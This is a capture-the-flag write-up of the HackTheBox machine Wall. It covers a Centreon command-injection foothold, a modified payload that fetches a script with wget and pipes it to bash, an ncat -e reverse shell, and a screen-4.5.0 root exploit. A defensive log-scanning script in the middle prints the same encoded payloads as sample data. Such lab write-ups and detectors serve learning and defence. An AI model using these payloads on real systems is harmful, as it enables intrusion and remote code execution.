Htb Wall Writeup


HackTheBox Wall writeup.

Overview

This is a writeup of the HackTheBox machine Wall.

  • OS: Linux
  • IP: 10.10.10.157
  • Difficulty: Medium

Information Gathering

When we run an nmap scan against the machine we get the following results.

Both port 22 (SSH) and port 80 (HTTP) are open. Browsing to port 80 shows only the default Apache page, so the logical next step is to fuzz it for hidden paths. We can do this using dirsearch. The script can be found at

  https://github.com/maurosoria/dirsearch

and can be run with the command

  python3 dirsearch.py -u http://10.10.10.157/ -e html

When we run this command we get a lot of results, but not all of them are useful. There is a page called /monitoring which presents an admin login page. There are a few things that can be tried at this stage:

  • Check common usernames and passwords
  • Fuzz further with larger wordlists
  • Change the HTTP method from GET to POST

You can do this in multiple ways.

  • Tools like dirbuster or dirsearch
  • Burp Suite Repeater

Using Burp Suite we can intercept the traffic and see what happens when the GET is changed to a POST. Sending a POST request to http://10.10.10.157/monitoring returns a redirect to a new page.

When we go to this new page we can see a Centreon login page. The first thing I did was research common default credentials for the program and test some basic passwords. The next step would have been to brute-force it, but luckily I was able to guess the password (password1), so brute-forcing was not necessary. When logged in you are brought to this new webpage.

Initial Foothold

Whilst browsing through the Centreon application you will find an area where commands can be executed. This is found under Configuration > Commands > Checks. In addition, there is an exploit for this remote code execution in Metasploit. This exploit however didn't work, so I looked at the code to see how it could be changed. Within the payload information we can see the line

  "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

this can be changed to

  "nagios_bin": "wget${IFS}-qO-${IFS}http://10.10.xx.xx/a${IFS}|${IFS}bash;"

You can then run this exploit in one terminal whilst using the command

  nc -lvnp <port>

in another terminal to listen for the shell. If successful you should be left with a shell for the user www-data.
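From the defender's side, the two payload shapes above (the Metasploit default `ncat -e`, and the `${IFS}`-separated `wget ... | bash` chain used to dodge space filtering) are easy to recognise once requests are URL-decoded and `${IFS}` is rewritten to a space. The following Python script is an added example, not part of the original writeup or of Centreon: it scans Apache-style access-log lines for those indicators. The log lines, the attacker address 10.10.14.5 and the placement of `nagios_bin` in a query string are all constructed for illustration; in a real Centreon deployment the value travels in a POST body, so you would feed it decoded request bodies (for example from a ModSecurity audit log) instead.

```python
import re
from urllib.parse import unquote_plus

# Patterns drawn from the two payload forms shown in the writeup: the Metasploit
# default (ncat -e ...) and the ${IFS} download-and-pipe-to-bash variant.
IFS_RE = re.compile(r"\$\{IFS\}|\$IFS\b")                   # shell whitespace substitute
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba)?sh\b")          # "| bash" / "|sh"
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^|;]*https?://")  # fetch from a URL
REV_SHELL_RE = re.compile(r"\b(?:ncat|nc)\s+-\w*e\b")       # nc/ncat -e <shell>

# Apache common/combined log prefix: client ip ... [time] "request line"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')


def decode(raw):
    """URL-decode up to twice so double-encoded payloads are seen in clear."""
    text = raw
    for _ in range(2):
        nxt = unquote_plus(text)
        if nxt == text:
            break
        text = nxt
    return text


def scan_request(raw):
    """Return the list of injection indicators found in one request string."""
    decoded = decode(raw)
    reasons = []
    if IFS_RE.search(decoded):
        reasons.append("IFS whitespace substitution")
    # Rewrite ${IFS} to a space so the regexes see what the shell would run.
    norm = IFS_RE.sub(" ", decoded)
    if FETCH_RE.search(norm) and PIPE_TO_SHELL_RE.search(norm):
        reasons.append("download piped to shell")
    elif PIPE_TO_SHELL_RE.search(norm):
        reasons.append("pipe to shell")
    if REV_SHELL_RE.search(norm):
        reasons.append("netcat -e reverse shell")
    return reasons


def scan_log(lines):
    """Return a list of (client_ip, request_line, reasons) for flagged lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request = m.groups()
        reasons = scan_request(request)
        if reasons:
            hits.append((ip, request, reasons))
    return hits


# Constructed sample log (not captured from the HTB machine). The nagios_bin
# value is placed in a query string for illustration only; a real Centreon
# request would carry it in a POST body.
SAMPLE_LOG = """\
10.10.14.9 - - [01/Jan/2020:10:00:01 +0000] "GET /monitoring HTTP/1.1" 404 275 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2020:10:00:02 +0000] "POST /centreon/index.php HTTP/1.1" 302 0 "-" "python-requests/2.22"
10.10.14.5 - - [01/Jan/2020:10:00:03 +0000] "GET /centreon/index.php?nagios_bin=wget%24%7BIFS%7D-qO-%24%7BIFS%7Dhttp%3A%2F%2F10.10.14.5%2Fa%24%7BIFS%7D%7C%24%7BIFS%7Dbash%3B HTTP/1.1" 200 512 "-" "python-requests/2.22"
10.10.14.5 - - [01/Jan/2020:10:00:04 +0000] "GET /centreon/index.php?nagios_bin=ncat+-e+/bin/bash+10.10.14.5+4444+%23 HTTP/1.1" 200 512 "-" "python-requests/2.22"
"""

if __name__ == "__main__":
    for ip, request, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, "|", ", ".join(reasons), "|", request)
```

The plain listener command `nc -lvnp <port>` is deliberately not matched: the `-\w*e` pattern only fires when `-e` (execute) is among the flags, which is what turns netcat into a shell rather than a listener.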

Getting User and Root

The first step is to run ls -la, which shows that there is another user called Shelby. This can be confirmed with cat /etc/passwd.

If you check for SUID binaries you will find screen-4.5.0.

The exploit script for this doesn't work out of the box, so you need to compile its components manually. Once compiled they need to be transferred to the victim machine.

This can be done over a python http server using the command

  python3 -m http.server

then on the victim machine, as www-data, you can wget the files into the /tmp directory, as that location is writable by www-data. You can wget the two files with the commands

  wget http://<LocalTunnelIP>:<port>/libhax.so

and

  wget http://<LocalTunnelIP>:<port>/rootshell

You can finally execute this file and you will get a root shell, and therefore also the user flag.
